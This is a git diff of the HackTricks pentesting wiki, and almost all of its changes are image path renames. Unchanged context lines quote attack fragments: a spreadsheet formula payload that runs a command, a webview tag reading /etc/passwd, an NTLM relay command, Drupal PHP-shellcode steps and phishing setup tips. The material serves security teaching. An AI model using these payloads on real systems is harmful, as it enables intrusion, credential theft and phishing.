A broadcast receiver will be waiting for a type of message. Depending on ho the receiver handles the message it could be vulnerable.\
[**Learn how to exploit Broadcast Receivers with Drozer.**](./#exploiting-broadcast-receivers)
@ -377,7 +376,7 @@ _Note that you can **omit the package name** and the mobile will automatically c
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
![](<../../.gitbook/assets/image (436) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (436) (1) (1).png>)
#### Sensitive info
@ -497,7 +496,7 @@ By default, it will also use some Frida Scripts to **bypass SSL pinning**, **roo
MobSF can also **invoke exported activities**, grab **screenshots** of them and **save** them for the report.
To **start** the dynamic testing press the green bottom: "**Start Instrumentation**". Press the "**Frida Live Logs**" to see the logs generated by the Frida scripts and "**Live API Monitor**" to see all the invocation to hooked methods, arguments passed and returned values (this will appear after pressing "Start Instrumentation").\
MobSF also allows you to load your own **Frida scripts (**to send the results of your Friday scripts to MobSF use the function `send()`). It also has **several pre-written scripts** you can load (you can add more in `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), just **select them**, press "**Load**" and press "**Start Instrumentation**" (you will be able to see the logs of that scripts inside "**Frida Live Logs**").
MobSF also allows you to load your own \*\*Frida scripts (\*\*to send the results of your Friday scripts to MobSF use the function `send()`). It also has **several pre-written scripts** you can load (you can add more in `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), just **select them**, press "**Load**" and press "**Start Instrumentation**" (you will be able to see the logs of that scripts inside "**Frida Live Logs**").
![](<../../.gitbook/assets/image (215).png>)

View file

@ -223,7 +223,7 @@ In this case you could try to abuse the functionality creating a web with the fo
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
![](<../../.gitbook/assets/image (436) (1) (1).png>)
![](<../../.gitbook/assets/image (436) (1) (1) (1).png>)
Learn how to [call deep links without using HTML pages](./#exploiting-schemes-deep-links).

View file

@ -36,7 +36,7 @@ GDA is also a powerful and fast reverse analysis platform. Which does not only s
**Only for Windows.**
![](<../../.gitbook/assets/image (207) (1).png>)
![](<../../.gitbook/assets/image (207) (1) (1).png>)
### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)

View file

@ -210,7 +210,7 @@ However there are **a lot of different command line useful options** that you ca
First of all you need to download the Der certificate from Burp. You can do this in _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_
![](<../../.gitbook/assets/image (367) (1).png>)
![](<../../.gitbook/assets/image (367).png>)
**Export the certificate in Der format** and lets **transform** it to a form that **Android** is going to be able to **understand.** Note that **in order to configure the burp certificate on the Android machine in AVD** you need to **run** this machine **with** the **`-writable-system`** option.\
For example you can run it like:

View file

@ -59,7 +59,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/
You should also check the **ContentProvider code** to search for queries:
![](<../../../.gitbook/assets/image (121) (1) (1).png>)
![](<../../../.gitbook/assets/image (121) (1) (1) (1).png>)
Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:
@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n
![](<../../../.gitbook/assets/image (187).png>)
![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1) (1).png>)
![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1).png>)
Because you will be able to call them

View file

@ -711,7 +711,7 @@ You can collect console logs through the Xcode **Devices** window as follows:
5. Reproduce the problem.
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (5).png>)
![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (5).png>)
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:

View file

@ -6,7 +6,7 @@ description: >-
# Pentesting Methodology
![](<.gitbook/assets/p2 (1).png>)
![](.gitbook/assets/p2.png)
{% hint style="warning" %}
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

View file

@ -25,7 +25,7 @@ Several **counter-measures** could be in place to avoid this vulnerability.
### CSRF map
![](<../.gitbook/assets/image (307) (1).png>)
![](<../.gitbook/assets/image (112).png>)
## Defences Bypass

View file

@ -14,7 +14,7 @@ The following properties or combination of properties apply to ViewState informa
## **Test Cases**
![](<../../.gitbook/assets/image (309).png>)
![](<../../.gitbook/assets/image (309) (1).png>)
### Test Case: 1 EnableViewStateMac=false and viewStateEncryptionMode=false

View file

@ -149,7 +149,7 @@ You can download [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) fro
Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) with Java classes for being tested.
![](<../../.gitbook/assets/intruder4 (1) (1).gif>)
![](<../../.gitbook/assets/intruder4 (1) (1) (1).gif>)
### More Information

View file

@ -4,7 +4,7 @@
First of all, we need to understand `Object`in JavaScript. An object is simply a collection of key and value pairs, often called properties of that object. For example:
![](<../../../.gitbook/assets/image (356).png>)
![](<../../../.gitbook/assets/image (389) (1).png>)
In Javascript, `Object`is a basic object, the template for all newly created objects. It is possible to create an empty object by passing `null`to `Object.create`. However, the newly created object will also have a type that corresponds to the passed parameter and inherits all the basic properties.

View file

@ -41,7 +41,7 @@ The good news is that **this payload is executed automatically when the file is
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1).png>)
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png>)
### More

View file

@ -500,7 +500,7 @@ def handleResponse(req, interesting):
## More info
![](../../.gitbook/assets/eki5edauuaaipik.jpg)
![](../../.gitbook/assets/EKi5edAUUAAIPIK.jpg)
[Image from here.](https://twitter.com/SpiderSec/status/1200413390339887104?ref\_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1200413390339887104\&ref\_url=https%3A%2F%2Ftwitter.com%2FSpiderSec%2Fstatus%2F1200413390339887104)

View file

@ -52,7 +52,7 @@ Note that if you put just the new line characters sending a header without conte
In this case the injection was performed inside the request line:
![](<../../.gitbook/assets/image (645) (1) (1).png>)
![](<../../.gitbook/assets/image (640) (1).png>)
### URL Prefix Injection

View file

@ -102,7 +102,7 @@ Note that in this case if the **"victim" is the attacker** he can now perform **
This attack is similar to the previous one, but **instead of injecting a payload inside the cache, the attacker will be caching victim information inside of the cache:**
![](<../.gitbook/assets/image (630) (1) (1).png>)
![](<../.gitbook/assets/image (643) (1) (1).png>)
### Response Splitting

View file

@ -69,7 +69,7 @@ In order to **find event listeners** in the current page you can:
* **Search** the JS code for `window.addEventListener` and `$(window).on` (_JQuery version_)
* **Execute** in the developer tools console: `getEventListeners(window)`
![](<../.gitbook/assets/image (618) (1).png>)
![](<../.gitbook/assets/image (618) (1) (1).png>)
* **Go to** _Elements --> Event Listeners_ in the developer tools of the browser

View file

@ -87,5 +87,5 @@ Regexp (a+)*$ took 723 milliseconds.
## Tools
{% embed url="https://github.com/doyensec/regexploit" %}
* [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
* [https://devina.io/redos-checker](https://devina.io/redos-checker)

View file

@ -8,7 +8,7 @@
## Attacks Graphic
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (2) (3).png>)
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (3).png>)
## Tool

View file

@ -72,11 +72,11 @@ Then, a malicious user could insert a different Unicode character equivalent to
You could use one of the following characters to trick the webapp and exploit a XSS:
![](<../.gitbook/assets/image (312).png>)
![](<../.gitbook/assets/image (312) (1).png>)
Notice that for example the first Unicode character purposed can be sent as: `%e2%89%ae` or as `%u226e`
![](<../.gitbook/assets/image (215) (1) (1).png>)
![](<../.gitbook/assets/image (215) (1).png>)
## References

View file

@ -91,7 +91,7 @@ Some **examples**:
## WAF bypass encoding image
![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/EauBb2EX0AERaNK.jpg)
![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg)
## Injecting inside raw HTML

View file

@ -19,7 +19,7 @@ Then, in "Dev Tools" --> "Sources" **select the file** you want to override and
This will **copy the JS file locally** and you will be able to **modify that copy in the browser**. So just add the **`debugger;`** command wherever you want, **save** the change and **reload** the page, and every-time you access that web page **your local JS copy is going to be loaded** and your debugger command maintained in its place:
![](<../../.gitbook/assets/image (642).png>)
![](<../../.gitbook/assets/image (648).png>)
## References

View file

@ -83,7 +83,7 @@ grep "auth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#\|noauth" #Not
Mongo Object IDs are **12-byte hexadecimal** strings:
![](../.gitbook/assets/id-and-ObjectIds-in-MongoDB.png)
![](../.gitbook/assets/id-and-objectids-in-mongodb.png)
For example, heres how we can dissect an actual Object ID returned by an application: 5f2459ac9fa6dc2500314019

View file

@ -124,7 +124,7 @@ Once administrative access to the BMC is obtained, there are a number of methods
![](https://blog.rapid7.com/content/images/post-images/27966/ipmi\_boot.png)
![](<../.gitbook/assets/image (202) (2).png>)
![](<../.gitbook/assets/image (202) (1).png>)
## Exploiting the BMC from the Host

View file

@ -22,7 +22,7 @@
* **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** (with a different internal IP) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service.\
When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints`
![](<../../.gitbook/assets/image (467) (1).png>)
![](<../../.gitbook/assets/image (467).png>)
* **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods (through API server). The kubelet doesnt manage containers that were not created by Kubernetes.
* **Kube-proxy**: is the service in charge of the communications (services) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors.
@ -163,7 +163,7 @@ http://127.0.0.1:50034/api/v1/namespaces/kubernetes-dashboard/services/http:kube
Each configuration file has 3 parts: **metadata**, **specification** (what need to be launch), **status** (desired state).\
Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run:
![](<../../.gitbook/assets/image (458) (1) (1).png>)
![](<../../.gitbook/assets/image (458) (1) (1) (1).png>)
#### Example of Deployment + Service declared in the same configuration file (from [here](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml))
@ -369,7 +369,7 @@ helm search <keyword>
Helm is also a template engine that allows to generate config files with variables:
![](<../../.gitbook/assets/image (462).png>)
![](<../../.gitbook/assets/image (465) (1).png>)
## Kubernetes secrets

View file

@ -123,7 +123,7 @@ Responder is going to **impersonate all the service using the mentioned protocol
It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS.
![](<../../.gitbook/assets/poison (1) (1).jpg>)
![](<../../.gitbook/assets/poison (1) (1) (1).jpg>)
## Inveigh
@ -161,7 +161,7 @@ If you want to use **MultiRelay**, go to _**/usr/share/responder/tools**_ and ex
python MultiRelay.py -t <IP target> -u ALL #If "ALL" then all users are relayed
```
![](<../../.gitbook/assets/image (209) (1).png>)
![](<../../.gitbook/assets/image (209).png>)
### Post-Exploitation (MultiRelay)
@ -191,7 +191,7 @@ To disable LLMNR in your domain for DNS clients, open gpedit.msc.\
Navigate to Computer Configuration->Administrative Templates->Network->DNS client.\
Locate the option “Turn off multicast name resolution” and click “policy setting”:
![](<../../.gitbook/assets/1 (1).jpg>)
![](../../.gitbook/assets/1.jpg)
Once the new window opens, enable this option, press Apply and click OK:

View file

@ -19,7 +19,7 @@ Scalar objects define a single object instance whereas tabular objects define mu
**OIDs** stands for **O**bject **Id**entifiers. **OIDs uniquely identify managed objects in a MIB hierarchy**. This can be depicted as a tree, the levels of which are assigned by different organizations. Top level MIB object IDs (OIDs) belong to different standard organizations.\
**Vendors define private branches including managed objects for their own products.**
![](../../.gitbook/assets/snmp\_oid\_mib\_tree.png)
![](../../.gitbook/assets/SNMP\_OID\_MIB\_Tree.png)
You can **navigate** through an **OID tree** from the web here: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) or **see what a OID means** (like `1.3.6.1.2.1.1`) accessing [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1).\
There are some **well-known OIDs** like the ones inside [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) that references MIB-2 defined Simple Network Management Protocol (SNMP) variables. And from the **OIDs pending from this one** you can obtain some interesting host data (system data, network data, processes data...)

View file

@ -24,7 +24,7 @@ Accessing _/user/\<number>_ you can see the number of existing users, in this ca
![](<../../.gitbook/assets/image (257).png>)
![](<../../.gitbook/assets/image (227) (1) (1).png>)
![](<../../.gitbook/assets/image (227) (1) (1) (1).png>)
## Hidden pages enumeration
@ -49,7 +49,7 @@ You need the **plugin php to be installed** (check it accessing to _/modules/php
Go to _Modules_ -> (**Check**) _PHP Filter_ -> _Save configuration_
![](<../../.gitbook/assets/image (247) (1).png>)
![](<../../.gitbook/assets/image (252).png>)
Then click on _Add content_ -> Select _Basic Page_ or _Article -_> Write _php shellcode on the body_ -> Select _PHP code_ in _Text format_ -> Select _Preview_

View file

@ -68,11 +68,11 @@ Now that we know which kind of information is saved inside the database, let's t
In the introspection you can find **which object you can directly query for** (because you cannot query an object just because it exists). In the following image you can see that the "_queryType_" is called "_Query_" and that one of the fields of the "_Query_" object is "_flags_", which is also a type of object. Therefore you can query the flag object.
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-17-48.png>)
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-17-48.png)
Note that the type of the query "_flags_" is "_Flags_", and this object is defined as below:
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-22-57.png>)
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png)
You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query:
@ -195,7 +195,7 @@ Or even **relations of several different objects using aliases**:
In the **introspection** you can find the **declared** **mutations**. In the following image the "_MutationType_" is called "_Mutation_" and the "_Mutation_" object contains the names of the mutations (like "_addPerson_" in this case):
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-26-27.png>)
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-26-27.png)
For this example imagine a data base with **persons** identified by the email and the name and **movies** identified by the name and rating. A **person** can be **friend** with other **persons** and a person can **have movies**.
@ -255,7 +255,7 @@ Below you can find the simplest demonstration of an application authentication r
As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token.
![](<../../.gitbook/assets/image (119) (2).png>)
![](<../../.gitbook/assets/image (119) (1).png>)
## CSRF in GraphQL

View file

@ -320,7 +320,7 @@ C:\xampp\tomcat\conf\server.xml
If you see an error like the following one:
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (2).png>)
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1).png>)
It means that the server **didn't receive the correct domain name** inside the Host header.\
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.

View file

@ -161,7 +161,7 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one *
</methodCall>
```
![](../../.gitbook/assets/1\_JaUYIZF8ZjDGGB7ocsZC-g.png)
![](../../.gitbook/assets/1\_jauyizf8zjdggb7ocszc-g.png)
If you get **faultCode** with a value **greater** then **0** (17), it means the port is open.
@ -187,7 +187,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
</methodCall>
```
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (102).png>)

View file

@ -122,7 +122,7 @@ There are 2 places where built-int methods can be overwritten: In preload code o
If `contextIsolation` set to false you can try to use \<webview> (similar to \<iframe> butcan load local files) to read local files and exfiltrate them: using something like **\<webview src=”file:///etc/passwd”>\</webview>:**
![](../../../.gitbook/assets/1-u1jdryuwaevwjmf\_f2ttjg.png)
![](<../../../.gitbook/assets/1 u1jdRYuWAEVwJmf\_F2ttJg.png>)
## **XSS Phishing via Internal URL regex bypass**

View file

@ -264,7 +264,7 @@ Some really bad implementations allowed the Null PIN to connect (very weird also
All the proposed WPS attacks can be easily performed using _**airgeddon.**_
![](<../../.gitbook/assets/image (201) (1).png>)
![](<../../.gitbook/assets/image (124).png>)
* 5 and 6 lets you try **your custom PIN** (if you have any)
* 7 and 8 perform the **Pixie Dust attack**
@ -352,7 +352,7 @@ _Note that as the client was deauthenticated it could try to connect to a differ
Once in the `airodump-ng` appears some handshake information this means that the handshake was captured and you can stop listening:
![](<../../.gitbook/assets/image (172) (1) (1).png>)
![](<../../.gitbook/assets/image (172) (1).png>)
Once the handshake is captured you can **crack** it with `aircrack-ng`:

View file

@ -339,7 +339,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
![](<../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (7).png>)
![](<../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (7).png>)
{% hint style="info" %}
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\
@ -380,7 +380,7 @@ Note that **in order to increase the credibility of the email**, it's recommende
* Search for **public emails** like info@ex.com or press@ex.com or public@ex.com and send them an email and wait for the response.
* Try to contact **some valid discovered** email and wait for the response
![](<../.gitbook/assets/image (393).png>)
![](<../.gitbook/assets/image (67) (1).png>)
{% hint style="info" %}
The Email Template also allows to **attach files to send**. If you would also like to steal NTLM challenges using some specially crafted files/documents [read this page](../windows/ntlm/places-to-steal-ntlm-creds.md).

View file

@ -10,7 +10,7 @@ If you ends in a code **using shift rights and lefts, xors and several arithmeti
If this function is used, you can find which **algorithm is being used** checking the value of the second parameter:
![](<../../.gitbook/assets/image (375) (1) (1).png>)
![](<../../.gitbook/assets/image (254) (1).png>)
Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
@ -145,7 +145,7 @@ You can identify both of them checking the constants. Note that the sha\_init ha
Note the use of more constants
![](<../../.gitbook/assets/image (253) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (253) (1) (1).png>)
## CRC (hash)
@ -173,7 +173,7 @@ A CRC hash algorithm looks like:
The graph is quiet large:
![](<../../.gitbook/assets/image (207) (2) (1).png>)
![](<../../.gitbook/assets/image (207) (2).png>)
Check **3 comparisons to recognise it**:

View file

@ -55,7 +55,7 @@ DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
And click on **compile**:
![](<../../.gitbook/assets/image (314) (1) (1).png>)
![](<../../.gitbook/assets/image (314) (1).png>)
Then save the new file on _**File >> Save module...**_:

View file

@ -10,7 +10,7 @@ Active Directory objects such as users and groups are securable objects and DACL
An example of ACEs for the "Domain Admins" securable object can be seen here:
![](../../.gitbook/assets/1.png)
![](<../../.gitbook/assets/1 (1).png>)
Some of the Active Directory object permissions and types that we as attackers are interested in:

View file

@ -37,7 +37,7 @@ If you don't want to wait an hour you can use a PS script to make the restore ha
Note the spotless' user membership:
![](<../../.gitbook/assets/1 (2) (1) (1).png>)
![](<../../.gitbook/assets/1 (2) (1).png>)
However, we can still add new users:

View file

@ -61,7 +61,7 @@ Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount FAKECOMPUTE
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it worked
```
![](../../.gitbook/assets/B2.png)
![](../../.gitbook/assets/b2.png)
#### Using powerview
@ -105,7 +105,7 @@ rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:admin
Note that users has an attribute called "**Cannot be delegated**". If a user has this attribute to True, you won't be able to impersonate him . This property can be seen inside bloodhound.
{% endhint %}
![](../../.gitbook/assets/B3.png)
![](../../.gitbook/assets/b3.png)
### Accessing

View file

@ -57,7 +57,7 @@ Using _Restricted Admin mode for RDP_, when you connect to a remote computer usi
Note that as your credentials are not being saved on the RDP session if **try to access network resources** your credentials won't be used. **The machine identity will be used instead**.
![](../../.gitbook/assets/ram.png)
![](../../.gitbook/assets/RAM.png)
From [here](https://blog.ahasayen.com/restricted-admin-mode-for-rdp/).

Some files were not shown because too many files have changed in this diff Show more